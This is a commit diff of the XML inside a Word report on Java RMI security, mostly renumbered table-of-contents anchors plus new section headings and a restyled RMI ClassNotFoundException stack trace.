<commit_message>
Report (writing in progress), its helper doc and images added.
</commit_message>
<xml_diff>
--- a/Report/Initial/version3/Report.docx
+++ b/Report/Initial/version3/Report.docx
@@ -306,7 +306,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc396749997" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784294" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -349,7 +349,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396749997 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784294 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -394,7 +394,7 @@
               <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396749998" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784295" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -437,7 +437,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396749998 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784295 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -479,7 +479,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396749999" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784296" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -519,7 +519,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396749999 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784296 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -561,7 +561,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750000" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784297" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -601,7 +601,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750000 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784297 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -643,7 +643,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750001" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784298" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -683,7 +683,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750001 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784298 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -725,7 +725,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750002" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784299" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -765,7 +765,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750002 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784299 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -810,7 +810,7 @@
               <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750003" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784300" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -853,7 +853,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750003 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784300 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -895,7 +895,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750004" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784301" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -935,7 +935,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750004 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784301 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -977,7 +977,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750005" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784302" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1017,7 +1017,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750005 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784302 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1062,7 +1062,7 @@
               <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750006" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784303" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1105,7 +1105,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750006 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784303 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1147,7 +1147,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750007" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784304" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1187,7 +1187,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750007 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784304 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1229,7 +1229,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750008" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784305" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1269,7 +1269,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750008 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784305 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1311,7 +1311,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750009" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784306" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1351,7 +1351,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750009 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784306 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1393,7 +1393,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750010" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784307" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1433,7 +1433,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750010 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784307 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1475,7 +1475,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750011" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784308" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1515,7 +1515,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750011 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784308 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1535,7 +1535,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1557,7 +1557,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750012" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784309" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1597,7 +1597,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750012 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784309 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1618,6 +1618,252 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc396784310" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>4.3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Things to take care of before running the service:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784310 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc396784311" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>4.4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Application in action:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784311 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc396784312" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>4.5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Malicious code injection:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784312 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1642,7 +1888,7 @@
               <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750013" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784313" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1685,7 +1931,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750013 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784313 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1705,7 +1951,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1730,7 +1976,7 @@
               <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750014" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784314" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1773,7 +2019,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750014 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784314 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1793,7 +2039,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1815,7 +2061,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750015" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784315" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1855,7 +2101,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750015 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784315 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1875,7 +2121,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1897,7 +2143,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc396750016" w:history="1">
+          <w:hyperlink w:anchor="_Toc396784316" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1937,7 +2183,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc396750016 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc396784316 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1957,7 +2203,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1991,7 +2237,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc396749997"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc396784294"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Overview</w:t>
@@ -2045,7 +2291,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc396749998"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc396784295"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Technical background</w:t>
@@ -2059,7 +2305,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc396749999"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc396784296"/>
       <w:r>
         <w:t>What is RMI?</w:t>
       </w:r>
@@ -2085,7 +2331,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc396750000"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc396784297"/>
       <w:r>
         <w:t xml:space="preserve">How does </w:t>
       </w:r>
@@ -3376,7 +3622,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc396750001"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc396784298"/>
       <w:r>
         <w:t>Technical implementation of RMI:</w:t>
       </w:r>
@@ -3601,7 +3847,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc396750002"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc396784299"/>
       <w:r>
         <w:t>Implementing s</w:t>
       </w:r>
@@ -4029,7 +4275,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc396750003"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc396784300"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Security Analysis of RMI technology</w:t>
@@ -4040,7 +4286,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc396750004"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc396784301"/>
       <w:r>
         <w:t>Case study -1</w:t>
       </w:r>
@@ -4450,7 +4696,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc396750005"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc396784302"/>
       <w:r>
         <w:t>Vulnerability analysis</w:t>
       </w:r>
@@ -4926,7 +5172,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc396750006"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc396784303"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Test application</w:t>
@@ -4943,7 +5189,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc396750007"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc396784304"/>
       <w:r>
         <w:t>Overview:</w:t>
       </w:r>
@@ -5015,7 +5261,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc396750008"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc396784305"/>
       <w:r>
         <w:t>Application components:</w:t>
       </w:r>
@@ -5030,7 +5276,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc396750009"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc396784306"/>
       <w:r>
         <w:t xml:space="preserve">Job </w:t>
       </w:r>
@@ -5188,7 +5434,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc396750010"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc396784307"/>
       <w:r>
         <w:t>Remote Interface:</w:t>
       </w:r>
@@ -5524,7 +5770,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc396750011"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc396784308"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Server-side </w:t>
@@ -6120,7 +6366,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc396750012"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc396784309"/>
       <w:r>
         <w:t>C</w:t>
       </w:r>
@@ -6893,6 +7139,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc396784310"/>
       <w:r>
         <w:t>Things to take care</w:t>
       </w:r>
@@ -6905,6 +7152,7 @@
       <w:r>
         <w:t xml:space="preserve"> running the service:</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6984,222 +7232,114 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="CodeSnippet"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
+        <w:pStyle w:val="ConsoleError"/>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>java.rmi.ServerException</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>RemoteException</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t xml:space="preserve"> occurred in server thread; nested exception is: </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="CodeSnippet"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
+        <w:pStyle w:val="ConsoleError"/>
+      </w:pPr>
+      <w:r>
         <w:tab/>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>java.rmi.UnmarshalException</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t xml:space="preserve">: error </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>unmarshalling</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t xml:space="preserve"> arguments; nested exception is: </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="CodeSnippet"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
+        <w:pStyle w:val="ConsoleError"/>
+      </w:pPr>
+      <w:r>
         <w:tab/>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>java.lang.ClassNotFoundException</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>: uk.ac.rm950.breachOfConfidentialityClient.SymmetricEncryption</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="CodeSnippet"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
+        <w:pStyle w:val="ConsoleError"/>
+      </w:pPr>
+      <w:r>
         <w:tab/>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>at</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t xml:space="preserve"> sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:353)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="CodeSnippet"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
+        <w:pStyle w:val="ConsoleError"/>
+      </w:pPr>
+      <w:r>
         <w:t>…</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="CodeSnippet"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
